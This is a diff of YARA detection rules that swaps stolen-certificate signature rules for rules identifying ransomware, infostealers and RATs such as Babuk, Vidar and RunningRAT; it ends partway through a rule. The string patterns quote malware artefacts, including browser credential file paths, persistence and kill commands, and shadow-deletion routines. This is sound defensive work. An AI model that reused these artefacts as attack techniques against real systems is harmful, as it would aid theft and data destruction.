-
-rule DITEKSHEN_INDICATOR_KB_CERT_02Fa994D660De659Ee9037Ecb437D766 : FILE
+rule DITEKSHEN_MALWARE_Win_Fonix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Fonix ransomware"
 		author = "ditekSHen"
-		id = "cb2aa5d6-913e-5d74-a903-1cb88fb63b1c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d67cce49-5f4f-59f6-b2a9-9c4dd1c6c0f6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6044-L6056"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3459-L3481"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "0868a2a7b5e276d3a4a40cdef994de934d33d62a689d7207a31fd57d012ef948"
-		logic_hash = "04244701311fcdc77b1e3a8f20621e474ed607be3d109c629280d528e2f24e1f"
+		logic_hash = "159b8946f7772c76271de821eb12897689bf73d96fc6a1d7c4a65cdc50b877c7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0cb6bde041b58dbd4ec64bd5a3be38c50f17bb3d"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Ransomware.Fonix"
+
+	strings:
+		$s1 = "dontcryptanyway" fullword wide
+		$s2 = "Cpriv.key" ascii wide
+		$s3 = "Cpub.key" ascii wide
+		$s4 = "NetShareEnum() failed!Error: % ld" fullword wide
+		$s5 = "<div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay" wide
+		$s6 = "Encryption Completed !!!" fullword wide
+		$s7 = "kill process" fullword ascii
+		$s8 = "Copy SystemID C:\\ProgramData\\SystemID" ascii
+		$id1 = "].FONIX" fullword wide
+		$id2 = "xinofconfig.txt" fullword ascii wide
+		$id3 = "XINOF4MUTEX" wide
+		$id4 = ":\\Fonix\\cryptoPP\\" ascii
+		$id5 = "schtasks /CREATE /SC ONLOGON /TN fonix" ascii
+		$id6 = "Ransomware\\Fonix" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Piriform Software Ltd" and pe.signatures [ i ] . serial == "02:fa:99:4d:66:0d:e6:59:ee:90:37:ec:b4:37:d7:66" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or 3 of ( $id* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0B446546C36525Bf5F084F6Bbbba7097 : FILE
+rule DITEKSHEN_MALWARE_Win_Bobik : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Bobik infostealer"
 		author = "ditekSHen"
-		id = "608a410d-d34f-5eea-92db-3d156d01d360"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "12f14151-0c89-519d-85d3-4b4b82a950a3"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6058-L6071"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3483-L3498"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "3163ffc06848f6c48ac460ab844470ef85a07b847bf187c2c9cb26c14032a1a5"
-		logic_hash = "6dcf87b929c28cc013ee5c9de85aa026e335e1e5c38a440bc6b5dc11c6bf9a91"
+		logic_hash = "735dcb9e04956863305ca89a43686b8e48e3b20784ae9292cfc40d1c2c09d467"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "05cdf79b0effff361dac0363adaa75b066c49de0"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.Bobik"
+
+	strings:
+		$s1 = "@Default\\Login Data" fullword ascii
+		$s2 = "@Default\\Cookies" fullword ascii
+		$s3 = "@logins.json" fullword ascii
+		$s4 = "@[EXECUTE]" fullword ascii
+		$s5 = "@C:\\Windows\\System32\\cmd.exe" fullword ascii
+		$s6 = /(CHROME|OPERA|FIREFOX)_BASED/ fullword ascii
+		$s7 = "threads.nim" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TeamViewer Germany GmbH" and pe.signatures [ i ] . serial == "0b:44:65:46:c3:65:25:bf:5f:08:4f:6b:bb:ba:70:97" and 1608724800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00E4E795Fd1Fd25595B869Ce22Aa7Dc49F : FILE
+rule DITEKSHEN_MALWARE_Win_Runningrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects RunningRAT"
 		author = "ditekSHen"
-		id = "8807c05d-c13b-58e8-9dda-c2eae6b5979c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "161faa8c-614e-5102-bb6d-c1ed4abf8274"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6087-L6101"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3500-L3536"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0aef5e2af3059597d218c544bc0b56078e1ef924af0530c62aa12679e0816410"
+		logic_hash = "e3cddec792ad95d823190f12970b8e0515b73be4a91f89cbb2bbde2fa1cfde63"
 		score = 75
-		quality = 75
+		quality = 23
 		tags = "FILE"
-		thumbprint = "269f25e6b7c690ae094086bd7825d03b48d4fcb1"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.RunningRAT"
+
+	strings:
+		$s1 = "%s%d.dll" fullword ascii
+		$s2 = "/c ping 127.0.0.1 -n" ascii
+		$s3 = "del /f/q \"%s\"" ascii
+		$s4 = "GUpdate" fullword ascii
+		$s5 = "%s\\%d.bak" fullword ascii
+		$s6 = "\"%s\",MainThread" ascii
+		$s7 = "rundll32.exe" fullword ascii
+		$rev1 = "emankcosteg" fullword ascii
+		$rev2 = "ini.revreS\\" fullword ascii
+		$rev3 = "daerhTniaM,\"s%\" s%" ascii
+		$rev4 = "s% etadpUllD,\"s%\" 23lldnuR" ascii
+		$rev5 = "---DNE yromeMmorFdaoL" fullword ascii
+		$rev6 = "eMnigulP" fullword ascii
+		$rev7 = "exe.23lldnuR\\" fullword ascii
+		$rev8 = "dnammoc\\nepo\\llehs\\" ascii
+		$rev9 = "\"s%\" k- exe.tsohcvs\\23metsyS\\%%tooRmetsyS%" ascii
+		$rev10 = "emanybtsohteg" fullword ascii
+		$rev11 = "tekcosesolc" fullword ascii
+		$rev12 = "tpokcostes" fullword ascii
+		$rev13 = "emantsohteg" fullword ascii
+		$v2_1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword ascii
+		$v2_2 = "LoadFromMemory END---" fullword ascii
+		$v2_3 = "hmProxy!= NULL" fullword ascii
+		$v2_4 = "Rundll32 \"%s\",DllUpdate %s" fullword ascii
+		$v2_5 = "ipip.website" fullword ascii
+		$v2_6 = "%d*%sMHz" fullword ascii
+		$v2_7 = "\\Server.ini" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OASIS COURT LIMITED" and ( pe.signatures [ i ] . serial == "00:e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" or pe.signatures [ i ] . serial == "e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f" ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or 5 of ( $rev* ) or 6 of ( $v* ) or 8 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_008E0Fa6B464D466Df1B267504B04F7B27 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent05 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects an unknown dropper. Typically exisys as a DLL in base64-encoded gzip-compressed file embedded within another executable"
 		author = "ditekSHen"
-		id = "6de3aab7-7175-537b-8a33-56cb0662b7a6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "a8a72484-42be-5c5c-962b-75bed8acdf39"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6103-L6114"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3538-L3551"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1f992d81b63108840d457f3f1906524cf4a9d4bec4a91f7bc826fae9989d40e0"
+		logic_hash = "e8c7c03451bbfcba7a1ab02f8c1320ad50d17d2e990f0e2f89942faea2a1e531"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "91707c95044c5badcd51d198bdbe3a7ff3156c35"
-		importance = 20
+		clamav_sig = "MALWARE.Win.Trojan.DLAgent05"
+
+	strings:
+		$s1 = "MARCUS.dll" fullword ascii wide
+		$s2 = "GZipStream" fullword ascii
+		$s3 = "MemoryStream" fullword ascii
+		$s4 = "proj_name" fullword ascii
+		$s5 = "res_name" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ApcWCjFsGXwbWUJrKZ" and pe.signatures [ i ] . serial == "00:8e:0f:a6:b4:64:d4:66:df:1b:26:75:04:b0:4f:7b:27" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_559Cb90Fd16E9D1Ad375F050Ab6A6616 : FILE
+rule DITEKSHEN_MALWARE_Win_Nemty : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nemty/Nefilim ransomware"
 		author = "ditekSHen"
-		id = "8b2ed295-5aae-5ced-9603-8125b4e261f9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "361269c6-5215-5ecf-869c-3c55ff8387e1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6116-L6127"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3553-L3577"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a91f23e2281efb95b780b26018f1c89485a87c6541ac84025dad3e6dd55c742e"
+		logic_hash = "dcebcddc472f4fb3bb34c35fc5a5424e54bfc3a262fdae10b189d210217b9b37"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "78a149f9a04653b01df09743571df938f9873fa5"
-		importance = 20
+
+	strings:
+		$s1 = "Go build ID:" ascii
+		$s2 = "GOMAXPROCSGetIfEntryGetVersionGlagoliticKharoshthiManichaeanOld_ItalicOld_PermicOld_TurkicOther_MathPOSTALCODEPhoenicianSaurasht" ascii
+		$s3 = "crypto/x509.ExtKeyUsage" ascii
+		$s4 = "crypto/x509.KeyUsageContentCommitment" ascii
+		$s5 = "DEK-Info header" ascii
+		$s6 = "GetUserProfileDirectoryWMagallanes Standard TimeMontevideo Standard TimeNorth Asia Standard TimePacific SA Standard TimeQueryPerformanceCounter" fullword ascii
+		$s7 = "*( -  <  =  >  k= m=%: +00+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12..." ascii
+		$s8 = "Go cmd/compile go1.10" fullword ascii
+		$s9 = ".dllprogramdatarecycle.bin" ascii
+		$s10 = ".dll.exe.lnk.sys.url" ascii
+		$vx1_1 = "Fa1led to os.OpenFile()" ascii
+		$vx1_2 = "-HELP.txt" ascii
+		$vf1_1 = "main.CTREncrypt" fullword ascii
+		$vf1_2 = "main.FileSearch" fullword ascii
+		$vf1_3 = "main.getdrives" fullword ascii
+		$vf1_4 = "main.RSAEncrypt" fullword ascii
+		$vf1_5 = "main.SaveNote" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shenzhen Smartspace Software technology Co.,Limited" and pe.signatures [ i ] . serial == "55:9c:b9:0f:d1:6e:9d:1a:d3:75:f0:50:ab:6a:66:16" )
+		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or ( all of ( $vx* ) and 2 of ( $s* ) ) or all of ( $vf* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Eb95A7Bd7553533D : FILE
+rule DITEKSHEN_MALWARE_Win_Qnapcrypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects QnapCrypt/Lockedv1/Cryptfile2 ransomware"
 		author = "ditekSHen"
-		id = "b9198469-4eba-552d-a8f5-5841893ff85e"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "3ef5643a-f2af-5d62-8927-e46679e069c2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6159-L6170"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3579-L3607"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e646346d94791c2a86a7240d4cf1f9138a30ca583b021ae5b17471cef20a98de"
+		logic_hash = "68fc3f0503d82295ffa5bfb49bda8b790142913217775a2812e3965a6c9a1fe1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "8d658fd671fa097c3db18906a29e8c1fa45113d9"
-		importance = 20
+
+	strings:
+		$go = "Go build ID:" ascii
+		$s1 = "Encrypting %s..." ascii
+		$s2 = "\\Start Menu\\Programs\\StartUp\\READMEV" ascii
+		$s3 = "main.deleteRecycleBin" ascii
+		$s4 = "main.encryptFiles" ascii
+		$s5 = "main.antiVirtualBox" ascii
+		$s6 = "main.antiVmware" ascii
+		$s7 = "main.deleteShadows" ascii
+		$s8 = "main.delUAC" ascii
+		$s9 = "main.KillProcess" ascii
+		$s10 = "main.delExploit" ascii
+		$s11 = "main.encrypt" ascii
+		$s12 = "main.ClearLogDownload" ascii
+		$s13 = "main.ClearLog" ascii
+		$s14 = "main.EndEncrypt" ascii
+		$s15 = "main.RunFuckLogAndSoft" ascii
+		$s16 = "main.ClearUsercache" ascii
+		$s17 = "main.FirstDuty" ascii
+		$s18 = ".lockedv1" ascii
+		$s19 = "WSAStartup\\clear.bat\\ngrok.exe\\video.mp4" ascii
+		$s20 = "net stop " ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\x02C\\x02\\x97\\x04\\x17\\x04\\x1e\\x04.\\x02\\x90\\x00g\\x02\\x94\\x02\\xae\\x00p\\x04 \\x00K\\x04J\\x02\\x88\\x042\\x02K\\x02\\xa3" and pe.signatures [ i ] . serial == "eb:95:a7:bd:75:53:53:3d" )
+		uint16( 0 ) == 0x5a4d and $go and 6 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0A1F3A057A1Dce4Bf7D76D0C7Adf837E : FILE
+rule DITEKSHEN_MALWARE_Win_Alfonoso : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Alfonoso / Shurk / HunterStealer infostealer"
 		author = "ditekSHen"
-		id = "c4829ec0-b6be-5701-a4cf-e4b1205240b3"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "2766e74e-c13a-5ce4-8f62-de9cc11e3cf0"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6172-L6184"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3609-L3638"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "2df05a70d3ce646285a0f888df15064b4e73034b67e06d9a4f4da680ed62e926"
-		logic_hash = "de9ae66e497730db54fc21a745426c687c3a4d9819c08bc1dca0b42a5b8070ac"
+		logic_hash = "18e5731ffd70abf2ab70852d54dacc3588dd90cfb4f2ceaee66dfce750535b26"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "8279b87c89507bc6e209a7bd8b5c24b31fb9a6dc"
-		importance = 20
+		snort2_sid = "920102"
+		snort3_sid = "920100"
+		clamav_sig = "MALWARE.Win.Trojan.Alfonso"
+
+	strings:
+		$s1 = "%s\\etilqs_" fullword ascii
+		$s2 = "SELECT name, rootpage, sql FROM '%q'.%s" fullword ascii
+		$s3 = "%s-mj%08X" fullword ascii
+		$s4 = "| Site:" ascii
+		$s5 = "| Login:" ascii
+		$s6 = "| Password:" ascii
+		$s7 = "| BUILD NAME:" ascii
+		$s8 = "recursive_directory_iterator" ascii
+		$s9 = { 2e 7a 69 70 00 00 00 00 2e 7a 6f 6f 00 00 00 00
+                2e 61 72 63 00 00 00 00 2e 6c 7a 68 00 00 00 00
+                2e 61 72 6a 00 00 00 00 2e 67 7a 00 2e 74 67 7a
+                00 00 00 00 }
+		$s10 = "Shurk Steal" fullword ascii
+		$s11 = ":memory:" fullword ascii
+		$s12 = "current_path()" fullword ascii
+		$s13 = "vtab:%p:%p" fullword ascii
+		$f1 = "chatlog.txt" ascii
+		$f2 = "servers.fav" ascii
+		$f3 = "\\USERDATA.DAT" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Qihu Technology Co., Ltd." and pe.signatures [ i ] . serial == "0a:1f:3a:05:7a:1d:ce:4b:f7:d7:6d:0c:7a:df:83:7e" )
+		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 6 of ( $s* ) and 2 of ( $f* ) ) or ( all of ( $f* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00849Ea0945Dd2Ea2Dc3Cc2486578A5715 : FILE
+rule DITEKSHEN_MALWARE_Win_Vidar : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Vidar / ArkeiStealer"
 		author = "ditekSHen"
-		id = "8584af2e-6b1e-5141-abbf-84e414ffaead"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d858c463-26d7-5f96-ad9a-cb261a8c61c6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6186-L6197"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3640-L3650"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "824744510e73cd6717e3626a5a250466bfb5817fd7172fc32466c2e68e20947b"
+		logic_hash = "c95c8694c05ff0e8d28f098e668a8ae8fa70130e31af6c0e540c4e5596007e41"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8c56adfb8fba825aa9a4ab450c71d45b950e55a4"
-		importance = 20
+
+	strings:
+		$s1 = "\"os_crypt\":{\"encrypted_key\":\"" fullword ascii
+		$s2 = "screenshot.jpg" fullword wide
+		$s3 = "Content-Disposition: form-data; name=\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Biglin" and pe.signatures [ i ] . serial == "00:84:9e:a0:94:5d:d2:ea:2d:c3:cc:24:86:57:8a:57:15" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0537F25A88E24Cafdd7919Fa301E8146 : FILE
+rule DITEKSHEN_MALWARE_Win_Babuk : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Babuk ransomware"
 		author = "ditekSHen"
-		id = "b0dd33b4-2040-5021-bebc-5ca26d75f14c"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6bb7093f-bbef-5b43-b4f9-be72ae4ef319"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6215-L6227"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3652-L3674"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "72ac61e6311f2a6430d005052dbc0cc58587e7b75722b5e34a71081370f4ddd5"
-		logic_hash = "8cd68612354a756c4a52d6baea9ef6ed74c94f5fcf25baa2f72c1131e0828f84"
+		logic_hash = "5ca5c5106747cf8f4ccd5df4ddbc78321fea3c8f533cb807a704d270eb956007"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "922211f5ab4521941d26915aeb82ee728f931082"
-		importance = 20
+
+	strings:
+		$s1 = "ecdh_pub_k.bin" wide
+		$s2 = "How To Restore Your Files.txt" wide
+		$s3 = /(babuk|babyk)\s(ransomware|locker)/ ascii nocase
+		$s4 = "/login.php?id=" ascii
+		$s5 = "http://babuk" ascii
+		$s6 = "bootsect.bak" fullword wide
+		$s7 = "Can't open file after killHolder" ascii
+		$s8 = "Can't OpenProcess" ascii
+		$s9 = "DoYouWantToHaveSexWithCuongDong" ascii
+		$arg1 = "-lanfirst" fullword ascii
+		$arg2 = "-lansecond" fullword ascii
+		$arg3 = "-nolan" fullword ascii
+		$arg4 = "shares" fullword wide
+		$arg5 = "paths" fullword wide
+		$arg6 = "gdebug" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Avira Operations GmbH & Co. KG" and pe.signatures [ i ] . serial == "05:37:f2:5a:88:e2:4c:af:dd:79:19:fa:30:1e:81:46" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( 3 of ( $arg* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2E4A279Bde2Eb688E8Ab30F5904Fa875 : FILE
+rule DITEKSHEN_MALWARE_Win_Nitol : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Nitol backdoor"
 		author = "ditekSHen"
-		id = "3fd40418-9efe-5dfe-a4e2-01ff9c46a4d5"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "d545f826-11ff-5d0f-9a95-8232b19d35b6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6229-L6240"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3676-L3704"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "768b2cb64f7ce359285721bbfd2f2f6aac4065ec234dc091933d962a7f0ab79a"
+		logic_hash = "c0ddcd6179bea2f3af77ae198e07f55f62884e07a975623ae41bcec163060f89"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "0cdf4e992af760e59f3ea2f1648804d2a2b47bbc"
-		importance = 20
+
+	strings:
+		$s1 = "%$#@!.aspGET ^&*().htmlGET" ascii
+		$s2 = "Applications\\iexplore.exe\\shell\\open\\command" fullword ascii
+		$s3 = "taskkill /f /im rundll32.exe" fullword ascii
+		$s4 = "\\Tencent\\Users\\*.*" fullword ascii
+		$s5 = "[Pause Break]" fullword ascii
+		$s6 = ":]%d-%d-%d  %d:%d:%d" fullword ascii
+		$s7 = "GET %s HTTP/1.1" fullword ascii
+		$s8 = "GET %s%s HTTP/1.1" fullword ascii
+		$s9 = "Accept-Language: zh-cn" fullword ascii
+		$s10 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 5.1)" fullword ascii
+		$s11 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)" fullword ascii
+		$s12 = "User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)" fullword ascii
+		$w1 = ".aspGET" ascii
+		$w2 = ".htmGET" ascii
+		$w3 = ".htmlGET" ascii
+		$domain = "www.xy999.com" fullword ascii
+		$v2_1 = "loglass" fullword ascii
+		$v2_2 = "rlehgs" fullword ascii
+		$v2_3 = "eherrali" fullword ascii
+		$v2_4 = "agesrlu" fullword ascii
+		$v2_5 = "lepejagas" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lespeed Technology Co., Ltd" and pe.signatures [ i ] . serial == "2e:4a:27:9b:de:2e:b6:88:e8:ab:30:f5:90:4f:a8:75" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or ( all of ( $v2* ) ) or ( $domain and 3 of them ) or ( #w1 > 2 and #w2 > 2 and #w3 > 2 and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_Fbe6758Ae785D7C678A4Ad8De5C3F7E6 : FILE
+rule DITEKSHEN_MALWARE_Win_Strongpity : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects StrongPity"
 		author = "ditekSHen"
-		id = "4d080acc-fb11-5e4d-9c59-562f30376936"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "9dcc5edb-5c86-5412-af63-f88d488d5829"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6242-L6253"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3706-L3720"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c6d84435c5c4f71696ce0414c87216bbb0603cb75d6e37abaf73e3708904032e"
+		logic_hash = "e92147966cd68152eb536b805c4918462f72f64280d1b3df800bb41266aa232f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bd1958f0306fc8699e829541cd9b8c4fe0e0c6da920932f2cd4d78ed76bda426"
-		importance = 20
+
+	strings:
+		$s1 = "Boundary%08X" ascii wide
+		$s2 = "Content-Disposition: form-data; name=\"file\";" fullword ascii
+		$s3 = "%sfilename=\"%ls\"" fullword ascii
+		$s4 = "name=%ls&delete=" fullword ascii
+		$s5 = "Content-Type: application/octet-stream" fullword ascii
+		$s6 = "cmd.exe /C ping" wide
+		$s7 = "& rmdir /Q /S \"" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HORUM" and pe.signatures [ i ] . serial == "fb:e6:75:8a:e7:85:d7:c6:78:a4:ad:8d:e5:c3:f7:e6" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00A73B6D821F84Db4451D6Eedd62C42848 : FILE
+rule DITEKSHEN_MALWARE_Win_Jssloader : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects JSSLoader RAT/backdoor"
 		author = "ditekSHen"
